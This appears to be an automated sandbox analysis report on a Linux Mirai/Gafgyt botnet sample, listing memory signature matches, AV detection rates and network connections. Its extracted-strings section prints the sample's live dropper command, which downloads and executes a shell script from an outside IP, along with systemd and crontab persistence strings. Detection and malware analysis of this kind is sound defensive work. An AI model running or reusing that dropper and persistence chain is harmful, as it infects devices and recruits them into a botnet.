6521.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5340:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6521.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0xd038:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
6521.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0x83e2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6521.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xc091:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6521.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xa8c6:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6521.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0x83b2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6536.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0xc3a5:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
6536.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5340:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6536.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0xd038:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
6536.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0x83e2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6536.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xc091:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6536.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xa8c6:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6536.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0x83b2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6484.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0xc3a5:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
6484.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5340:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6484.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0xd038:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
6484.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0x83e2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6484.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xc091:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6484.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xa8c6:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6484.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0x83b2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6545.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0xc3a5:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
6545.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5340:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6545.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0xd038:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
6545.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0x83e2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6545.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xc091:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6545.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xa8c6:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6545.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0x83b2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6594.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0xc3a5:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
6594.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5340:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6594.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0xd038:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
6594.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0x83e2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6594.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xc091:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6594.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xa8c6:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6594.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0x83b2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6538.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0xc3a5:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
6538.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5340:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6538.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0xd038:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
6538.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0x83e2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6538.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xc091:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6538.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xa8c6:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6538.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0x83b2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6557.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0xc3a5:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
6557.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5340:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6557.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0xd038:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
6557.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0x83e2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6557.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xc091:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6557.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xa8c6:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6557.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0x83b2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6450.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0xc3a5:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
6450.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5340:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6450.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0xd038:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
6450.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0x83e2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6450.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xc091:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6450.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xa8c6:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6450.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0x83b2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6603.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0xc3a5:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
6603.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5340:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6603.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0xd038:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
6603.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0x83e2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6603.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xc091:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6603.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xa8c6:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6603.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0x83b2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6496.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0xc3a5:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
6496.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5340:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6496.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0xd038:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
6496.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0x83e2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6496.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xc091:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6496.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xa8c6:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6496.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0x83b2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6544.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0xc3a5:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
6544.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5340:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6544.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0xd038:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
6544.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0x83e2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6544.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xc091:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6544.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xa8c6:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6544.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0x83b2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6482.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0xc3a5:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
6482.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5340:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6482.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0xd038:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
6482.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0x83e2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6482.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xc091:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6482.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xa8c6:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6482.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0x83b2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6578.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0xc3a5:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
6578.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5340:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6578.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0xd038:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
6578.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0x83e2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6578.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xc091:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6578.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xa8c6:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6578.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0x83b2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6528.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0xc3a5:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
6528.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5340:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6528.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0xd038:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
6528.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0x83e2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6528.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xc091:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6528.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xa8c6:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6528.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0x83b2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6523.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0xc3a5:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
6523.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5340:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6523.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0xd038:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
6523.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0x83e2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6523.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xc091:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6523.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xa8c6:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6523.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0x83b2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6489.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0xc3a5:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
6489.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5340:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6489.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0xd038:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
6489.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0x83e2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6489.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xc091:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6489.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xa8c6:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6489.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0x83b2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
Click to see the 310 entries

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: i586.elf	Virustotal: Detection: 53%			Perma Link
Source: i586.elf	ReversingLabs: Detection: 57%

Machine Learning detection for sample

Source: i586.elf

Joe Sandbox ML: detected

Source: i586.elf	String: cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd / \|\| cd /home; wget http://154.216.18.192/auto.sh \|\| busybox wget http://154.216.18.192/auto.sh \|\| curl -O http://154.216.18.192/auto.sh; chmod 777 auto.sh; ./auto.sh %s
Source: i586.elf	String: G%s/%s/proc//proc/%s/cmdlinewgetcurlnetstatgreppsbusyboxlsmvechokillkillallbashrebootshutdownhaltiptablespowerofffaggot got malware'd/tmp/opt/home/dev/var/sbin/proc/self/exe/mnt/root/dev/null/dev/console/var/wwwsystemctl daemon-reload/tmp/current_crontabcrontab %s/tmp/crontabXXXXXX@reboot %s
Source: i586.elf	String: systemctl enable startup_command.servicecrontab -l > /tmp/current_crontab 2>/dev/nullcd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd / \|\| cd /home; wget http://154.216.18.192/auto.sh \|\| busybox wget http://154.216.18.192/auto.sh \|\| curl -O http://154.216.18.192/auto.sh; chmod 777 auto.sh; ./auto.sh %s
Source: startup_command.service.13.dr	String: ExecStart=cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd / \|\| cd /home; wget http://154.216.18.192/auto.sh \|\| busybox wget http://154.216.18.192/auto.sh \|\| curl -O http://154.216.18.192/auto.sh; chmod 777 auto.sh; ./auto.sh (null)

Source: global traffic	TCP traffic: 192.168.2.23:43508 -> 45.200.149.167:2601
Source: global traffic	TCP traffic: 192.168.2.23:57092 -> 107.175.130.16:7722

Source: global traffic	TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global traffic	TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
